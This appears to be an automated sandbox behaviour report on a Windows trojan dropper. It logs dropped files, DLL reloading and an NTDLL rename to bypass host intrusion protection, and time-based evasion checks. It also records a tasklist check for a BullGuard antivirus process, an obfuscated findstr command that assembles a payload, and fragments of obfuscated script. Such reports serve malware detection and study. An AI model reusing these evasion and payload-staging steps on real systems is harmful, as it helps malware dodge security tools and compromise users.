Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: mswsock.dll	Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe"

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.00000000010E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbs source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdbKv source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbP source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: xBCzEiVyOcVH.dll.10.dr
Source:	Binary string: wntdll.pdb source: xBCzEiVyOcVH.dll.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbt source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000114C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_004067E3 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetWindow,

0_2_004067E3

Source: xBCzEiVyOcVH.dll.10.dr	Static PE information: section name: RT
Source: xBCzEiVyOcVH.dll.10.dr	Static PE information: section name: .mrdata
Source: xBCzEiVyOcVH.dll.10.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_004142E9 push ecx; ret	0_2_004142FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00413EFC push eax; ret	0_2_00413F1A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00978B75 push ecx; ret	10_2_00978B88

Source: xBCzEiVyOcVH.dll.10.dr

Static PE information: section name: .text entropy: 6.844715065913507

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

DLL reload attack detected

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		10_2_009D59B3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00965EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		10_2_00965EDA

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_009733B7

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Renames NTDLL to bypass HIPS

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Memory allocated: 13A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Memory allocated: 3050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_10-99471
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_0-7917

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_10-97722

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

API coverage: 5.8 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7580

Thread sleep time: -35000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000c6h], 0004h and CTI: jne 00404B4Ah	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cah], 000bh and CTI: jne 00404B70h	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cch], ax and CTI: je 00405F43h	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000c6h], 0019h and CTI: jne 00404B70h	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cah], 0006h and CTI: jne 00404B70h	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cch], ax and CTI: je 00405F43h	0_2_00404AEB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00403287 FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_00403287
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00402C10 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402C10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00402D2D FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_00402D2D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_009B4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009B494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_009B494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_009B3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_009BC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_009BCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BCD14 FindFirstFileW,FindClose,	10_2_009BCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_009BF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_009BF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_009BFA36

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_00965D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00965D13

Source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: Rarissima.exe.pif, 0000000A.00000003.1748202752.0000000001105000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1748731778.0000000001157000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1747680237.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1749052087.0000000001161000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1749444084.0000000001170000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1748565407.0000000001131000.00000004.00000020.00020000.00000000.sdmp, Inclina.tmp.0.dr	Binary or memory string: $SOMRYkBrHgFSadoimWqgKya = '698861197740405166678069256050785232686638371'
Source: Inclina.tmp.0.dr	Binary or memory string: $kCMoQuvMCIRwpguFf = 2112+3591
Source: Rarissima.exe.pif, 0000000A.00000003.1752519900.00000000038D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: KCMOQUVMCIRWPGUFF
Source: Inclina.tmp.0.dr	Binary or memory string: While $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG < 27
Source: Rarissima.exe.pif, 0000000A.00000003.1752519900.00000000038D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: KCMOQUVMCIRWPGUFFgC7`A
Source: Rarissima.exe.pif, 0000000A.00000003.1751439433.0000000003B0C000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1751756327.0000000003B0C000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1751294677.0000000003B05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SOMRYKBRHGFSADOIMWQGKYA
Source: Inclina.tmp.0.dr	Binary or memory string: $kCMoQuvMCIRwpguFf = Execute('Ptr(324)')
Source: Rarissima.exe.pif, 0000000A.00000003.1747609397.00000000010C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $kCMoQuvMCIRwpguFf = Execute('Ptr(324)')e
Source: Rarissima.exe.pif, 0000000A.00000003.1747609397.00000000010C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $kCMoQuvMCIRwpguFf = 2112+35911
Source: Inclina.tmp.0.dr	Binary or memory string: $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG = $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG + 1
